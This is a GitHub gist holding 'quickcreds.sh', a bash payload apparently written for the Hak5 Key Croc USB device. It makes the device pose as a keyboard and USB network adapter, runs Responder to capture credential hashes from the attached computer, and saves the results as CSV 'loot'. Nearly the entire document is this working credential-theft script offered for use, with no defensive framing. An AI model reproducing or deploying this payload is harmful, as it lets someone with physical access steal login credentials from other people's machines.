Skip to content

Instantly share code, notes, and snippets.

@Klepvink

Klepvink/quickcreds.sh

Created September 16, 2020 22:17
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save Klepvink/d4742f4684e55475b2544c71895fbee4 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save Klepvink/d4742f4684e55475b2544c71895fbee4 to your computer and use it in GitHub Desktop.
Download ZIP
[Key croc] Quickcreds croc-flavor
Raw
quickcreds.sh
#!/bin/bash
#
# Title: Quickcreds - croco-flavor
# Author: Klepvink -- Cred: Hak5Darren && Mubix (based this script on https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/credentials/QuickCreds/payload.txt)
# Version: 1.0
#
# First making sure that Responder is installed (in the right location)
echo -e ""
echo -e "\e[32mQuickcreds - croco-flavor\e[0m"
echo -e "\e[32mKlepvink -- Cred: Hak5Darren && Mubix\e[0m"
echo
if [ ! -f "/tools/responder/Responder.py" ]
then
read -p $'\e[34m[!]\e[0m Responder was not detected. Would you like to install it? (INSTALL_EXTRAS) [y/n] ' choice
case "$choice" in
y|Y ) INSTALL_EXTRAS;;
n|N ) ;;
* ) echo -e "\e[31m[-]\e[0m Invalid input. Continuing anyway";;
esac
fi
RESPONDER_OPTIONS="-w -r -d -P"
LOOTDIR=/root/loot/quickcreds
mkdir -p $LOOTDIR
echo -e "\e[32m[+]\e[0m Setting attackmode..."
while read -r l
do
echo -e "\e[34m[!]\e[0m $l"
done < <(ATTACKMODE HID RNDIS_ETHERNET)
# Checking if lease was succesful
if [[ -z $(grep -s 172.16.64.* /var/lib/dhcp/dhcpd.leases) ]]
then
echo -e "\e[31m[-]\e[0m DHCP-lease failed. Retrying..."
while read -r l
do
echo -e "\e[34m[!]\e[0m $l"
done < <(ATTACKMODE HID RNDIS_ETHERNET)
if [[ -z $(grep -s 172.16.64.* /var/lib/dhcp/dhcpd.leases) ]]
then
echo -e "\e[31m[-]\e[0m Could not assign IP. Exiting..."
echo -e "\e[34m[!]\e[0m Resetting attackmode..."
while read -r l
do
echo -e "\e[34m[!]\e[0m $l"
done < <(ATTACKMODE HID)
echo -e "\e[31m[-]\e[0m Script failed."
exit
fi
fi
LED Y QUAD &
echo -e "\e[32m[+]\e[0m Running responder..."
python /tools/responder/Responder.py -I usb0 $RESPONDER_OPTIONS 2> /dev/null
# After responder is done executing...
echo -e "\e[32m[+]\e[0m Resetting attackmode..."
while read -r l
do
echo -e "\e[34m[!]\e[0m $l"
done < <(ATTACKMODE HID)
echo -e "\e[32m[+]\e[0m Saving loot to loot directory..."
sqlite3 -header -csv /tools/responder/Responder.db "select * from responder;" > "$LOOTDIR/Responderloot-$(date +'%d-%m-%Y').csv"
echo -e "\e[32m[+]\e[0m Done!"
exit
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment